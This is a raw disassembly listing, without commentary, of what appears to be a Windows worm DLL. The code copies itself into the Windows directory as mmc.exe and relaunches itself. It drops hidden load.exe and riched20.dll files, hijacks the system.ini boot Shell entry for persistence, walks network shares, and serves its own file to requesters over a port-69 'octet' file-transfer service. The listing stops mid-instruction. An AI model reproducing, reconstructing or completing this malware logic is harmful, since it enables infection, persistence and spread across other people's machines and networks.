36176AB2    lea     eax, [ebp+var_20]
36176AB5    push    esi
36176AB6    push    eax
36176AB7    call    _strcpy
36176ABC    lea     eax, [ebp+var_20]
36176ABF    push    eax
36176AC0    call    edi                     ; _strlwr
36176AC2    lea     eax, [ebp+var_20]
36176AC5    push    offset aAdmin_dll_1     ; "admin.dll"
36176ACA    push    eax
36176ACB    call    _strcmp
36176AD0    add     esp, 14h
36176AD3    neg     eax
36176AD5    sbb     eax, eax
36176AD7    and     al, 9Dh
36176AD9    add     eax, 63h
36176ADC    jmp     short loc_36176AE1
36176ADE ; ───────────────────────────────────────────────────────────────────────────
36176ADE
36176ADE loc_36176ADE:                      ; CODE XREF: sub_36176A22+4Dj
36176ADE                                    ; sub_36176A22+82j
36176ADE    push    1
36176AE0    pop     eax
36176AE1
36176AE1 loc_36176AE1:                      ; CODE XREF: sub_36176A22+8Bj
36176AE1                                    ; sub_36176A22+BAj
36176AE1    pop     edi
36176AE2    pop     esi
36176AE3    pop     ebx
36176AE4    leave
36176AE5    retn
36176AE5 sub_36176A22 endp
36176AE5
36176AE6
36176AE6 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176AE6
36176AE6 ; Attributes: bp-based frame
36176AE6
36176AE6 sub_36176AE6 proc near             ; CODE XREF: _DllMain@12+2Bp
36176AE6
36176AE6 var_864 = dword ptr -864h
36176AE6 var_854 = byte ptr -854h
36176AE6 var_454 = byte ptr -454h
36176AE6 var_54  = dword ptr -54h
36176AE6 var_24  = word ptr -24h
36176AE6 var_10  = byte ptr -10h
36176AE6 arg_0   = dword ptr 8
36176AE6
36176AE6    push    ebp
36176AE7    mov     ebp, esp
36176AE9    sub     esp, 854h
36176AEF    push    esi
36176AF0    push    edi
36176AF1    push    [ebp+arg_0]
36176AF4    call    sub_36176A22
36176AF9    cmp     eax, 63h
36176AFC    pop     ecx
36176AFD    jnz     loc_36176C0C
36176B03    xor     esi, esi
36176B05    push    offset aFsdhqherwqi200  ; "fsdhqherwqi2001"
36176B0A    push    esi
36176B0B    push    esi
36176B0C    call    ds:CreateMutexA
36176B12    mov     edi, eax
36176B14    call    ds:GetLastError
36176B1A    cmp     eax, 0B7h
36176B1F    jnz     short loc_36176B34
36176B21    cmp     edi, esi
36176B23    jz      short loc_36176B2C
36176B25    push    edi
36176B26    call    ds:CloseHandle
36176B2C
36176B2C loc_36176B2C:                      ; CODE XREF: sub_36176AE6+3Dj
36176B2C    push    1
36176B2E    pop     eax
36176B2F    jmp     loc_36176C4E
36176B34 ; ───────────────────────────────────────────────────────────────────────────
36176B34
36176B34 loc_36176B34:                      ; CODE XREF: sub_36176AE6+39j
36176B34    push    ebx
36176B35    push    edi
36176B36    call    ds:CloseHandle
36176B3C    mov     ebx, ds:GetModuleFileNameA
36176B42    mov     edi, 400h
36176B47    lea     eax, [ebp+var_854]
36176B4D    push    edi
36176B4E    push    eax
36176B4F    push    [ebp+arg_0]
36176B52    call    ebx                     ; GetModuleFileNameA
36176B54    test    eax, eax
36176B56    jnz     short loc_36176B63
36176B58    lea     eax, [ebp+var_854]
36176B5E    push    edi
36176B5F    push    eax
36176B60    push    esi
36176B61    call    ebx                     ; GetModuleFileNameA
36176B63
36176B63 loc_36176B63:                      ; CODE XREF: sub_36176AE6+70j
36176B63    lea     eax, [ebp+var_454]
36176B69    push    edi
36176B6A    push    eax
36176B6B    call    ds:GetWindowsDirectoryA
36176B71    lea     eax, [ebp+var_454]
36176B77    push    eax
36176B78    call    sub_3617186E
36176B7D    lea     eax, [ebp+var_454]
36176B83    mov     [esp+864h+var_864], offset aMmc_exe ; "\\mmc.exe"
36176B8A    push    eax
36176B8B    call    _strcat
36176B90    pop     ecx
36176B91    lea     eax, [ebp+var_454]
36176B97    pop     ecx
36176B98    push    esi
36176B99    push    eax
36176B9A    lea     eax, [ebp+var_854]
36176BA0    push    eax
36176BA1    call    ds:CopyFileA
36176BA7    lea     eax, [ebp+var_454]
36176BAD    push    1
36176BAF    push    eax
36176BB0    call    sub_361719A3
36176BB5    lea     eax, [ebp+var_454]
36176BBB    push    offset aQusery9bnow     ; " -qusery9bnow"
36176BC0    push    eax
36176BC1    call    _strcat
36176BC6    push    44h
36176BC8    lea     eax, [ebp+var_54]
36176BCB    pop     edi
36176BCC    push    edi
36176BCD    push    esi
36176BCE    push    eax
36176BCF    call    _memset
36176BD4    push    10h
36176BD6    lea     eax, [ebp+var_10]
36176BD9    push    esi
36176BDA    push    eax
36176BDB    call    _memset
36176BE0    add     esp, 28h
36176BE3    lea     eax, [ebp+var_10]
36176BE6    mov     [ebp+var_54], edi
36176BE9    mov     [ebp+var_24], si
36176BED    push    eax
36176BEE    lea     eax, [ebp+var_54]
36176BF1    push    eax
36176BF2    push    esi
36176BF3    push    esi
36176BF4    push    esi
36176BF5    push    esi
36176BF6    push    esi
36176BF7    lea     eax, [ebp+var_454]
36176BFD    push    esi
36176BFE    push    eax
36176BFF    push    esi
36176C00    call    ds:CreateProcessA
36176C06    push    1
36176C08    pop     eax
36176C09    pop     ebx
36176C0A    jmp     short loc_36176C4E
36176C0C ; ───────────────────────────────────────────────────────────────────────────
36176C0C
36176C0C loc_36176C0C:                      ; CODE XREF: sub_36176AE6+17j
36176C0C    push    400h
36176C11    call    ds:GetCommandLineA
36176C17    push    eax
36176C18    lea     eax, [ebp+var_854]
36176C1E    push    eax
36176C1F    call    ds:strncpy
36176C25    lea     eax, [ebp+var_854]
36176C2B    push    eax
36176C2C    call    ds:_strlwr
36176C32    lea     eax, [ebp+var_854]
36176C38    push    offset aQusery9bnow_0   ; "qusery9bnow"
36176C3D    push    eax
36176C3E    call    ds:strstr
36176C44    add     esp, 18h
36176C47    neg     eax
36176C49    sbb     eax, eax
36176C4B    and     eax, 63h
36176C4E
36176C4E loc_36176C4E:                      ; CODE XREF: sub_36176AE6+49j
36176C4E                                    ; sub_36176AE6+124j
36176C4E    pop     edi
36176C4F    pop     esi
36176C50    leave
36176C51    retn
36176C51 sub_36176AE6 endp
36176C51
36176C52
36176C52 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176C52
36176C52 ; Attributes: bp-based frame
36176C52
36176C52 sub_36176C52 proc near             ; CODE XREF: sub_36171F05+F5p
36176C52
36176C52 var_400 = byte ptr -400h
36176C52
36176C52    push    ebp
36176C53    mov     ebp, esp
36176C55    sub     esp, 400h
36176C5B    push    ebx
36176C5C    push    esi
36176C5D    mov     esi, ds:strncpy
36176C63    mov     ebx, 3F6h
36176C68    push    edi
36176C69    push    ebx
36176C6A    lea     eax, [ebp+var_400]
36176C70    push    offset byte_3617ACB8
36176C75    push    eax
36176C76    call    esi                     ; strncpy
36176C78    lea     eax, [ebp+var_400]
36176C7E    push    offset aLoad_exe        ; "\\load.exe"
36176C83    push    eax
36176C84    call    _strcat
36176C89    add     esp, 14h
36176C8C    lea     eax, [ebp+var_400]
36176C92    push    0
36176C94    push    eax
36176C95    push    offset byte_3617C0B8
36176C9A    call    ds:CopyFileA
36176CA0    mov     edi, ds:SetFileAttributesA
36176CA6    lea     eax, [ebp+var_400]
36176CAC    push    26h
36176CAE    push    eax
36176CAF    call    edi                     ; SetFileAttributesA
36176CB1    push    ebx
36176CB2    lea     eax, [ebp+var_400]
36176CB8    push    offset byte_3617B0B8
36176CBD    push    eax
36176CBE    call    esi                     ; strncpy
36176CC0    lea     eax, [ebp+var_400]
36176CC6    push    offset aSystem_ini      ; "\\system.ini"
36176CCB    push    eax
36176CCC    call    _strcat
36176CD1    add     esp, 14h
36176CD4    lea     eax, [ebp+var_400]
36176CDA    push    eax
36176CDB    push    offset aExplorer_exeLo  ; "explorer.exe load.exe -dontrunold"
36176CE0    push    offset shell            ; "Shell"
36176CE5    push    offset boot             ; "boot"
36176CEA    call    ds:WritePrivateProfileStringA
36176CF0    push    ebx
36176CF1    lea     eax, [ebp+var_400]
36176CF7    push    offset byte_3617ACB8
36176CFC    push    eax
36176CFD    call    esi                     ; strncpy
36176CFF    lea     eax, [ebp+var_400]
36176D05    push    offset aRiched20_dll_0  ; "\\riched20.dll"
36176D0A    push    eax
36176D0B    call    _strcat
36176D10    add     esp, 14h
36176D13    lea     eax, [ebp+var_400]
36176D19    push    80h
36176D1E    push    eax
36176D1F    call    edi                     ; SetFileAttributesA
36176D21    lea     eax, [ebp+var_400]
36176D27    push    0
36176D29    push    eax
36176D2A    push    offset byte_3617C0B8
36176D2F    call    ds:CopyFileA
36176D35    lea     eax, [ebp+var_400]
36176D3B    push    0
36176D3D    push    eax
36176D3E    call    sub_361719A3
36176D43    pop     ecx
36176D44    lea     eax, [ebp+var_400]
36176D4A    pop     ecx
36176D4B    push    26h
36176D4D    push    eax
36176D4E    call    edi                     ; SetFileAttributesA
36176D50    push    1
36176D52    pop     eax
36176D53    pop     edi
36176D54    pop     esi
36176D55    pop     ebx
36176D56    leave
36176D57    retn
36176D57 sub_36176C52 endp
36176D57
36176D58
36176D58 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176D58
36176D58 ; Attributes: bp-based frame
36176D58
36176D58 sub_36176D58 proc near             ; CODE XREF: sub_36171F05+112p
36176D58                                    ; sub_36176D58+DBp ...
36176D58
36176D58 var_34 = byte ptr -34h
36176D58 var_18 = dword ptr -18h
36176D58 var_14 = dword ptr -14h
36176D58 var_10 = dword ptr -10h
36176D58 var_C  = dword ptr -0Ch
36176D58 var_8  = dword ptr -8
36176D58 var_4  = dword ptr -4
36176D58 arg_0  = dword ptr 8
36176D58
36176D58    push    ebp
36176D59    mov     ebp, esp
36176D5B    sub     esp, 34h
36176D5E    lea     eax, [ebp-0Ch]
36176D61    push    edi
36176D62    or      dword ptr [ebp-4], 0FFFFFFFFh
36176D66    push    eax
36176D67    push    dword ptr [ebp+8]
36176D6A    xor     edi, edi
36176D6C    mov     dword ptr [ebp-8], 4000h
36176D73    push    edi
36176D74    push    edi
36176D75    push    2
36176D77    call    dword_3617AC88
36176D7D    test    eax, eax
36176D7F    jz      short loc_36176D88
36176D81    xor     eax, eax
36176D83    jmp     loc_36176E8C
36176D88 ; ───────────────────────────────────────────────────────────────────────────
36176D88
36176D88 loc_36176D88:                      ; CODE XREF: sub_36176D58+27j
36176D88    push    ebx
36176D89    push    esi
36176D8A
36176D8A loc_36176D8A:                      ; CODE XREF: sub_36176D58+111j
36176D8A    push    dword ptr [ebp-8]
36176D8D    push    8
36176D8F    push    dword_3617ACB4
36176D95    call    dword_3617AC74
36176D9B    mov     esi, eax
36176D9D    lea     eax, [ebp-8]
36176DA0    push    eax
36176DA1    lea     eax, [ebp-4]
36176DA4    push    esi
36176DA5    push    eax
36176DA6    push    dword ptr [ebp-0Ch]
36176DA9    mov     [ebp-14h], esi
36176DAC    call    dword_3617AC8C
36176DB2    cmp     eax, edi
36176DB4    mov     [ebp-18h], eax
36176DB7    jnz     loc_36176E4B
36176DBD    cmp     [ebp-4], edi
36176DC0    mov     [ebp+8], edi
36176DC3    jbe     loc_36176E52
36176DC9    add     esi, 14h
36176DCC
36176DCC loc_36176DCC:                      ; CODE XREF: sub_36176D58+ECj
36176DCC    cmp     dword ptr [esi-10h], 1
36176DD0    jnz     short loc_36176E25
36176DD2    lea     eax, [ebp-10h]
36176DD5    mov     dword ptr [ebp-10h], 19h
36176DDC    push    eax
36176DDD    lea     eax, [ebp-34h]
36176DE0    push    eax
36176DE1    call    ds:GetComputerNameA
36176DE7    push    edi
36176DE8    lea     ebx, [esi-14h]
36176DEB    push    edi
36176DEC    push    edi
36176DED    push    ebx
36176DEE    call    dword_3617AC80
36176DF4    test    eax, eax
36176DF6    jnz     short loc_36176E0C
36176DF8    push    dword ptr [esi]
36176DFA
36176DFA loc_36176DFA:                      ; CODE XREF: sub_36176D58+C5j
36176DFA    call    sub_36173DCF
36176DFF    pop     ecx
36176E00    push    edi
36176E01    push    edi
36176E02    push    dword ptr [esi]
36176E04    call    dword_3617AC84
36176E0A    jmp     short loc_36176E25
36176E0C ; ───────────────────────────────────────────────────────────────────────────
36176E0C
36176E0C loc_36176E0C:                      ; CODE XREF: sub_36176D58+9Ej
36176E0C    push    edi
36176E0D    lea     eax, [ebp+var_34]
36176E10    push    edi
36176E11    push    eax
36176E12    push    ebx
36176E13    call    dword_3617AC80
36176E19    push    dword ptr [esi]
36176E1B    test    eax, eax
36176E1D    jz      short loc_36176DFA
36176E1F    call    sub_36173DCF
36176E24    pop     ecx
36176E25
36176E25 loc_36176E25:                      ; CODE XREF: sub_36176D58+78j
36176E25                                    ; sub_36176D58+B2j
36176E25    mov     eax, [esi-8]
36176E28    and     eax, 2
36176E2B    cmp     al, 2
36176E2D    jnz     short loc_36176E38
36176E2F    lea     eax, [esi-14h]
36176E32    push    eax
36176E33    call    sub_36176D58
36176E38
36176E38 loc_36176E38:                      ; CODE XREF: sub_36176D58+D5j
36176E38    inc     dword ptr [ebp+8]
36176E3B    add     esi, 20h
36176E3E    mov     eax, [ebp+8]
36176E41    cmp     eax, [ebp-4]
36176E44    jb      short loc_36176DCC
36176E46    mov     esi, [ebp-14h]
36176E49    jmp     short loc_36176E52
36176E4B ; ───────────────────────────────────────────────────────────────────────────
36176E4B
36176E4B loc_36176E4B:                      ; CODE XREF: sub_36176D58+5Fj
36176E4B    cmp     eax, 103h
36176E50    jnz     short loc_36176E6E
36176E52
36176E52 loc_36176E52:                      ; CODE XREF: sub_36176D58+6Bj
36176E52                                    ; sub_36176D58+F1j
36176E52    push    esi
36176E53    push    edi
36176E54    push    dword_3617ACB4
36176E5A    call    dword_3617AC70
36176E60    cmp     dword ptr [ebp-18h], 103h
36176E67    jz      short loc_36176E7C
36176E69    jmp     loc_36176D8A
36176E6E ; ───────────────────────────────────────────────────────────────────────────
36176E6E
36176E6E loc_36176E6E:                      ; CODE XREF: sub_36176D58+F8j
36176E6E    push    esi
36176E6F    push    edi
36176E70    push    dword_3617ACB4
36176E76    call    dword_3617AC70
36176E7C
36176E7C loc_36176E7C:                      ; CODE XREF: sub_36176D58+10Fj
36176E7C    push    dword ptr [ebp-0Ch]
36176E7F    call    dword_3617AC90
36176E85    neg     eax
36176E87    sbb     eax, eax
36176E89    pop     esi
36176E8A    inc     eax
36176E8B    pop     ebx
36176E8C
36176E8C loc_36176E8C:                      ; CODE XREF: sub_36176D58+2Bj
36176E8C    pop     edi
36176E8D    leave
36176E8E    retn    4
36176E8E sub_36176D58 endp
36176E8E
36176E91
36176E91 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176E91
36176E91 ; Attributes: bp-based frame
36176E91
36176E91 sub_36176E91 proc near             ; CODE XREF: sub_36171F05+151p
36176E91
36176E91 var_B0 = byte ptr -0B0h
36176E91 var_70 = byte ptr -70h
36176E91 var_20 = dword ptr -20h
36176E91 var_1C = dword ptr -1Ch
36176E91 var_18 = dword ptr -18h
36176E91 var_14 = dword ptr -14h
36176E91 var_C  = dword ptr -0Ch
36176E91
36176E91    push    ebp
36176E92    mov     ebp, esp
36176E94    sub     esp, 0B0h
36176E9A    push    esi
36176E9B    call    sub_36172DAE
36176EA0    push    eax
36176EA1    call    dword_3617AC24
36176EA7    push    3Fh
36176EA9    push    eax
36176EAA    lea     eax, [ebp-0B0h]
36176EB0    push    eax
36176EB1    call    ds:strncpy
36176EB7    lea     eax, [ebp-70h]
36176EBA    push    offset asc_3617A404     ; "\\\\"
36176EBF    push    eax
36176EC0    call    _strcpy
36176EC5    lea     eax, [ebp-0B0h]
36176ECB    push    3Ch
36176ECD    push    eax
36176ECE    lea     eax, [ebp-70h]
36176ED1    push    eax
36176ED2    call    ds:strncat
36176ED8    push    20h
36176EDA    lea     eax, [ebp-20h]
36176EDD    push    0
36176EDF    push    eax
36176EE0    call    _memset
36176EE5    add     esp, 2Ch
36176EE8    and     dword ptr [ebp-18h], 0
36176EEC    lea     eax, [ebp-70h]
36176EEF    mov     dword ptr [ebp-20h], 2
36176EF6    push    1
36176EF8    mov     [ebp-0Ch], eax
36176EFB    pop     esi
36176EFC    lea     eax, [ebp-20h]
36176EFF    push    eax
36176F00    mov     [ebp-1Ch], esi
36176F03    mov     [ebp-14h], esi
36176F06    call    sub_36176D58
36176F0B    mov     eax, esi
36176F0D    pop     esi
36176F0E    leave
36176F0F    retn
36176F0F sub_36176E91 endp
36176F0F
36176F10
36176F10 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176F10
36176F10
36176F10 sub_36176F10 proc near             ; CODE XREF: sub_36171F05+A4p
36176F10    push    ecx
36176F11    lea     eax, [esp+0]
36176F15    push    eax
36176F16    xor     eax, eax
36176F18    push    eax
36176F19    push    eax
36176F1A    push    offset sub_36176F2C
36176F1F    push    eax
36176F20    push    eax
36176F21    call    ds:CreateThread
36176F27    push    1
36176F29    pop     eax
36176F2A    pop     ecx
36176F2B    retn
36176F2B sub_36176F10 endp
36176F2B
36176F2C
36176F2C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176F2C
36176F2C ; Attributes: bp-based frame
36176F2C
36176F2C sub_36176F2C proc near             ; DATA XREF: sub_36176F10+Ao
36176F2C
36176F2C var_644 = word ptr -644h
36176F2C var_440 = byte ptr -440h
36176F2C var_23C = byte ptr -23Ch
36176F2C var_23A = byte ptr -23Ah
36176F2C var_239 = byte ptr -239h
36176F2C var_38  = byte ptr -38h
36176F2C var_34  = byte ptr -34h
36176F2C var_32  = word ptr -32h
36176F2C var_30  = dword ptr -30h
36176F2C var_24  = word ptr -24h
36176F2C var_22  = word ptr -22h
36176F2C var_20  = dword ptr -20h
36176F2C var_14  = byte ptr -14h
36176F2C var_F   = byte ptr -0Fh
36176F2C var_8   = dword ptr -8
36176F2C var_4   = dword ptr -4
36176F2C
36176F2C    push    ebp
36176F2D    mov     ebp, esp
36176F2F    sub     esp, 644h
36176F35    push    ebx
36176F36    push    esi
36176F37    push    0FFFFFFF1h
36176F39    call    ds:GetCurrentThread
36176F3F    push    eax
36176F40    call    ds:SetThreadPriority
36176F46    xor     ebx, ebx
36176F48    push    ebx
36176F49    push    ebx
36176F4A    push    ebx
36176F4B    call    ds:CreateMutexA
36176F51    cmp     eax, ebx
36176F53    mov     dword_3617D70C, eax
36176F58    jnz     short loc_36176F62
36176F5A
36176F5A loc_36176F5A:                      ; CODE XREF: sub_36176F2C+74j
36176F5A    xor     eax, eax
36176F5C
36176F5C loc_36176F5C:                      ; CODE XREF: sub_36176F2C+92j
36176F5C    pop     esi
36176F5D    pop     ebx
36176F5E    leave
36176F5F    retn    4
36176F62 ; ───────────────────────────────────────────────────────────────────────────
36176F62
36176F62 loc_36176F62:                      ; CODE XREF: sub_36176F2C+2Cj
36176F62    push    10h
36176F64    lea     eax, [ebp-24h]
36176F67    push    ebx
36176F68    push    eax
36176F69    call    _memset
36176F6E    add     esp, 0Ch
36176F71    mov     word ptr [ebp-24h], 2
36176F77    push    ebx
36176F78    call    dword_3617AC2C
36176F7E    push    45h
36176F80    mov     [ebp-20h], eax
36176F83    call    dword_3617AC38
36176F89    push    ebx
36176F8A    push    2
36176F8C    push    2
36176F8E    mov     [ebp-22h], ax
36176F92    call    dword_3617AC5C
36176F98    mov     esi, eax
36176F9A    cmp     esi, 0FFFFFFFFh
36176F9D    mov     [ebp-4], esi
36176FA0    jz      short loc_36176F5A
36176FA2    push    edi
36176FA3    lea     eax, [ebp-24h]
36176FA6    push    10h
36176FA8    push    eax
36176FA9    push    esi
36176FAA    call    dword_3617AC54
36176FB0    test    eax, eax
36176FB2    jz      short loc_36176FC0
36176FB4    push    esi
36176FB5    call    dword_3617AC3C
36176FBB    xor     eax, eax
36176FBD    pop     edi
36176FBE    jmp     short loc_36176F5C
36176FC0 ; ───────────────────────────────────────────────────────────────────────────
36176FC0
36176FC0 loc_36176FC0:                      ; CODE XREF: sub_36176F2C+86j
36176FC0                                    ; sub_36176F2C+C9j ...
36176FC0    push    10h
36176FC2    pop     eax
36176FC3    mov     [ebp-8], eax
36176FC6    push    eax
36176FC7    lea     eax, [ebp-34h]
36176FCA    push    ebx
36176FCB    push    eax
36176FCC    call    _memset
36176FD1    add     esp, 0Ch
36176FD4    lea     eax, [ebp-8]
36176FD7    push    eax
36176FD8    lea     eax, [ebp-34h]
36176FDB    push    eax
36176FDC    push    ebx
36176FDD    lea     eax, [ebp-23Ch]
36176FE3    push    204h
36176FE8    push    eax
36176FE9    push    dword ptr [ebp-4]
36176FEC    call    dword_3617AC4C
36176FF2    cmp     eax, 0FFFFFFFFh
36176FF5    jz      short loc_36176FC0
36176FF7    lea     eax, [ebp-23Ch]
36176FFD    push    4
36176FFF    push    eax
36177000    lea     eax, [ebp-644h]
36177006    push    eax
36177007    call    _memcpy
3617700C    add     esp, 0Ch
3617700F    push    1
36177011    call    dword_3617AC34
36177017    cmp     [ebp-644h], ax
3617701E    jnz     short loc_36176FC0
36177020    lea     eax, [ebp-23Ah]
36177026    push    202h
3617702B    push    eax
3617702C    lea     eax, [ebp-440h]
36177032    push    eax
36177033    call    _memcpy
36177038    lea     eax, [ebp-440h]
3617703E    push    eax
3617703F    call    _strlen
36177044    add     esp, 10h
36177047    cmp     eax, ebx
36177049    jz      loc_36176FC0
3617704F    cmp     eax, 1FAh
36177054    jge     loc_36176FC0
3617705A    lea     eax, [ebp+eax-239h]
36177061    push    6
36177063    push    eax
36177064    lea     eax, [ebp-14h]
36177067    push    eax
36177068    call    _memcpy
3617706D    lea     eax, [ebp-14h]
36177070    mov     [ebp-0Fh], bl
36177073    push    eax
36177074    call    ds:_strlwr
3617707A    lea     eax, [ebp+var_14]
3617707D    push    offset aOctet           ; "octet"
36177082    push    eax
36177083    call    _strcmp
36177088    add     esp, 18h
3617708B    test    eax, eax
3617708D    jnz     loc_36176FC0
36177093    push    0FFFFFFFFh
36177095    push    dword_3617D70C
3617709B    call    ds:WaitForSingleObject
361770A1    mov     eax, dword_3617D710
361770A6
361770A6 loc_361770A6:                      ; CODE XREF: sub_36176F2C+193j
361770A6    cmp     eax, ebx
361770A8    jz      short loc_361770C1
361770AA    mov     ecx, [eax+4]
361770AD    cmp     ecx, [ebp+var_30]
361770B0    jnz     short loc_361770BC
361770B2    mov     cx, [eax+2]
361770B6    cmp     cx, [ebp+var_32]
361770BA    jz      short loc_361770FF
361770BC
361770BC loc_361770BC:                      ; CODE XREF: sub_36176F2C+184j
361770BC    mov     eax, [eax+10h]
361770BF    jmp     short loc_361770A6
361770C1 ; ───────────────────────────────────────────────────────────────────────────
361770C1
361770C1 loc_361770C1:                      ; CODE XREF: sub_36176F2C+17Cj
361770C1    push    14h
361770C3    push    8
361770C5    push    dword_3617ACB4
361770CB    call    dword_3617AC74
361770D1    cmp     eax, ebx
361770D3    jz      short loc_361770FF
361770D5    lea     esi, [ebp+var_34]
361770D8    mov     edi, eax
361770DA    movsd
361770DB    movsd
361770DC    movsd
361770DD    movsd
361770DE    mov     ecx, dword_3617D710
361770E4    mov     [eax+10h], ecx
361770E7    lea     ecx, [ebp+var_38]
361770EA    push    ecx
361770EB    push    ebx
361770EC    push    eax
361770ED    push    offset sub_36177110
361770F2    push    ebx
361770F3    push    ebx
361770F4    mov     dword_3617D710, eax
361770F9    call    ds:CreateThread
361770FF
361770FF loc_361770FF:                      ; CODE XREF: sub_36176F2C+18Ej
361770FF                                    ; sub_36176F2C+1A7j
361770FF    push    dword_3617D70C
36177105    call    ds:ReleaseMutex
3617710B    jmp     loc_36176FC0
3617710B sub_36176F2C endp
3617710B
36177110
36177110 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36177110
36177110 ; Attributes: bp-based frame
36177110
36177110 sub_36177110 proc near             ; DATA XREF: sub_36176F2C+1C1o
36177110
36177110 var_52C = dword ptr -52Ch
36177110 var_328 = word ptr -328h
36177110 var_326 = word ptr -326h
36177110 var_324 = byte ptr -324h
36177110 var_124 = dword ptr -124h
36177110 var_120 = dword ptr -120h
36177110 var_20  = dword ptr -20h
36177110 var_1C  = dword ptr -1Ch
36177110 var_14  = dword ptr -14h
36177110 var_10  = dword ptr -10h
36177110 var_C   = dword ptr -0Ch
36177110 var_8   = dword ptr -8
36177110 var_4   = dword ptr -4
36177110 arg_0   = dword ptr 8
36177110
36177110    push    ebp
36177111    mov     ebp, esp
36177113    sub     esp, 52Ch
36177119    push    ebx
3617711A    push    esi
3617711B    push    edi
3617711C    push    0FFFFFFF1h
3617711E    call    ds:GetCurrentThread
36177124    push    eax
36177125    call    ds:SetThreadPriority
3617712B    xor     esi, esi
3617712D    push    esi
3617712E    push    2
36177130    push    2
36177132    call    dword_3617AC5C
36177138    mov     edi, eax
3617713A    cmp     edi, 0FFFFFFFFh
3617713D    jz      loc_3617737F
36177143    push    10h
36177145    push    [ebp+arg_0]
36177148    push    edi
36177149    call    dword_3617AC58
3617714F    test    eax, eax
36177151    jnz     loc_36177378
36177157    push    esi
36177158    push    esi
36177159    push    3
3617715B    push    esi
3617715C    push    7
3617715E    push    80000000h
36177163    push    offset byte_3617C4B8
36177168    call    ds:CreateFileA
3617716E    cmp     eax, 0FFFFFFFFh
36177171    mov     [ebp+var_20], eax
36177174    jz      loc_36177378
3617717A    push    esi
3617717B    push    eax
3617717C    call    ds:GetFileSize
36177182    cmp     eax, 0FFFFFFFFh
36177185    jz      loc_3617736F
3617718B    push    1
3617718D    mov     [ebp+var_8], eax
36177190    pop     ebx
36177191    mov     [ebp+var_C], ebx
36177194
36177194 loc_36177194:                      ; CODE XREF: sub_36177110+25Aj
36177194    push    3
36177196    call    dword_3617AC38
3617719C    push    [ebp+var_C]
3617719F    mov     [ebp+var_328], ax
361771A6    call    dword_3617AC38
361771AC    cmp     [ebp+var_8], esi
361771AF    mov     [ebp+var_326], ax
361771B6    mov     [ebp+var_4], esi
361771B9    jz      short loc_361771DD
361771BB    lea     eax, [ebp+var_4]
361771BE    push    esi
361771BF    push    eax
361771C0    lea     eax, [ebp+var_324]
361771C6    push    200h
361771CB    push    eax
361771CC    push    [ebp+var_20]
361771CF    call    ds:ReadFile
361771D5    mov     eax, [ebp+var_4]
361771D8    sub     [ebp+var_8], eax
361771DB    jmp     short loc_361771E1
361771DD ; ───────────────────────────────────────────────────────────────────────────
361771DD
361771DD loc_361771DD:                      ; CODE XREF: sub_36177110+A9j
361771DD    or      [ebp+var_8], 0FFFFFFFFh
361771E1
361771E1 loc_361771E1:                      ; CODE XREF: sub_36177110+CBj
361771E1    mov     [ebp+var_10], esi
361771E4
361771E4 loc_361771E4:                      ; CODE XREF: sub_36177110+252j
361771E4    cmp     [ebp+var_10], 6
361771E8    jge     loc_3617736F
361771EE    push    8
361771F0    lea     eax, [ebp+var_1C]
361771F3    push    esi
361771F4    push    eax
361771F5    mov     [ebp+var_14], esi
361771F8    call    _memset
361771FD    add     esp, 0Ch
36177200    lea     eax, [ebp+var_1C]
36177203    mov     [ebp+var_1C], 2
3617720A    mov     [ebp+var_120], edi
36177210    push    eax
36177211    lea     eax, [ebp+var_124]
36177217    push    esi
36177218    push    eax
36177219    push    esi
3617721A    push    esi
3617721B    mov     [ebp+var_124], ebx
36177221    call    dword_3617AC40
36177227    cmp     eax, esi
36177229    jz      loc_3617736F
3617722F    cmp     eax, 0FFFFFFFFh
36177232    jz      loc_3617736F
36177238    lea     eax, [ebp+var_124]
3617723E    push    eax
3617723F    push    edi
36177240    call    dword_3617AC60
36177246    test    eax, eax
36177248    jz      loc_3617736F
3617724E    mov     eax, [ebp+var_4]
36177251    push    esi
36177252    add     eax, 4
36177255    push    eax
36177256    lea     eax, [ebp+var_328]
3617725C    push    eax
3617725D    push    edi
3617725E    call    dword_3617AC48
36177264    lea     eax, [ebp+var_1C]
36177267    push    eax
36177268    lea     eax, [ebp+var_124]
3617726E    push    esi
3617726F    push    eax
36177270    push    esi
36177271    push    esi
36177272    call    dword_3617AC40
36177278    cmp     eax, esi
3617727A    jz      loc_3617736F
36177280    cmp     eax, 0FFFFFFFFh
36177283    jz      loc_3617736F
36177289    lea     eax, [ebp+var_124]
3617728F    push    eax
36177290    push    edi
36177291    call    dword_3617AC60
36177297    test    eax, eax
36177299    jz      loc_3617736F
3617729F    mov     eax, [ebp+var_4]
361772A2    push    esi
361772A3    add     eax, 4
361772A6    push    eax
361772A7    lea     eax, [ebp+var_328]
361772AD    push    eax
361772AE    push    edi
361772AF    call    dword_3617AC48
361772B5
361772B5 loc_361772B5:                      ; CODE XREF: sub_36177110+249j
361772B5    inc     [ebp+var_14]
361772B8    push    8
361772BA    lea     eax, [ebp+var_1C]
361772BD push esi 361772BE push eax 361772BF call _memset 361772C4 add esp, 0Ch 361772C7 lea eax, [ebp+var_1C] 361772CA mov [ebp+var_1C], 2 361772D1 mov [ebp+var_120], edi 361772D7 push eax 361772D8 push esi 361772D9 lea eax, [ebp+var_124] 361772DF push esi 361772E0 push eax 361772E1 push esi 361772E2 mov [ebp+var_124], ebx 361772E8 call dword_3617AC40 361772EE cmp eax, esi 361772F0 jz short loc_36177355 361772F2 cmp eax, 0FFFFFFFFh 361772F5 jz short loc_36177355 361772F7 lea eax, [ebp+var_124] 361772FD push eax 361772FE push edi 361772FF call dword_3617AC60 36177305 test eax, eax 36177307 jz short loc_36177355 36177309 push esi 3617730A lea eax, [ebp+var_52C] 36177310 push 204h 36177315 push eax 36177316 push edi 36177317 call dword_3617AC50 3617731D push [ebp+var_52C] 36177323 call dword_3617AC34 36177329 cmp ax, 5 3617732D jz short loc_3617736F 3617732F push [ebp+var_52C] 36177335 call dword_3617AC34 3617733B cmp ax, 4 3617733F jnz short loc_36177355 36177341 push [ebp+var_52C+2] 36177347 call dword_3617AC34 3617734D movzx eax, ax 36177350 cmp eax, [ebp+var_C] 36177353 jz short loc_36177367 36177355 36177355 loc_36177355: ; CODE XREF: sub_36177110+1E0j 36177355 ; sub_36177110+1E5j ... 36177355 cmp 